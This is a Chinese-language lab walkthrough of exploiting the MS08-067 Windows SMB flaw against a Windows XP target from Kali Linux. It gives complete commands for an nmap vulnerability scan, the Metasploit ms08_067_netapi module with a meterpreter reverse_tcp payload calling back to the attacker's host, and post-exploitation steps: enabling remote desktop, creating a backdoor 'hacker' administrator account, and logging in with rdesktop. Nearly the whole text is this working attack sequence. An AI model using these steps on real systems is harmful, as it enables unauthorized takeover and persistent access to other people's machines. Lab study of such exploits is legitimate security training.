MS-08-067 windows smb服务 远程命令执行漏洞
漏洞概要
MS-08-067是Windows平台中smb
服务445端口的远程代码执行漏洞
利用成功可以远程控制主机
影响范围为:windows2000、xp、server 2003、server 2008、甚至早些版本的Win7
实验场景
攻击机:kali2022
msfconsole利用
靶机:windows xp
漏洞利用
使用ifconfig
和ipconfig
获取攻击机和靶机的IP地址
攻击机IP:172.16.1.117
靶机IP:172.16.1.116
nmap的默认脚本在/usr/share/nmap/scripts
,ls -l| grep 08-67
筛选漏洞相关模块
使用nmap
的漏洞扫描脚本smb-vuln-ms08-067
扫描靶机是否存在ms-08-067
漏洞
nmap -script smb-vuln-ms08-067 -p 445 172.16.1.116 -n
发现存在漏洞,使用msfconsole
进行利用
msfconsole启动漏洞平台
查找漏洞利用脚本
search ms08_067
使用漏洞利用模块,并使用show options
查看漏洞利用模块配置参数
use exploit/windows/smb/ms08_067_netapi
show options
Required
为yes
是必须要设置的参数
在最新版kali
中,对常见的漏洞自动选择了合适的payload,例如这里的windows/meterpreter/reverse_tcp
,并且配置自动配置了反弹会话的IP地址和端口
就是我们本机的IP和端口
如果不是这个payload
需要我们手动设置
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.117
set LPORT 4444
观察我们必须设置目标的IP地址,就是RHOSTS
,这里如果是RHOST
是只可以设置一个IP地址,如果是RHOSTS
则可以设置一个网段,对一个网段进行攻击
设置目标IP
set RHOSTS 172.16.1.116
这里端口默认就是445端口,不在改变
这里有一个target
可以设置,target是用来指定靶机操作系统类型的,指定的准确的话,跟容易利用成功
show targets
可以查看可以设置的target
这里有很多taret,我么使用target代号为34的
set target 34
设置完成后,可以使用check
命令查看靶机是否存在这个漏洞,check
只有在一些常见的漏洞中可以使用
存在漏洞,使用命令exploit
或者run
进行漏洞利用
利用成功,成功获取靶机会话,并且权限为SYTEM
最高权限
后面我们可以开启靶机的3389端口,进行远程桌面连接
使用run getgui -e
开启靶机3389端口
netstat查看靶机3389端口是否开放
创建hacker
用户,并加入到Aministrators
默认管理员组
net user hacker 123456 /add
net localgroup Aministrators hacker /add
最后可以使用net user hacker
查看是否已经加入到管理员组
打开一个新的终端,连接靶机远程桌面
rdesktop -u hacker -p 123456 172.16.1.116
成功获取靶机权限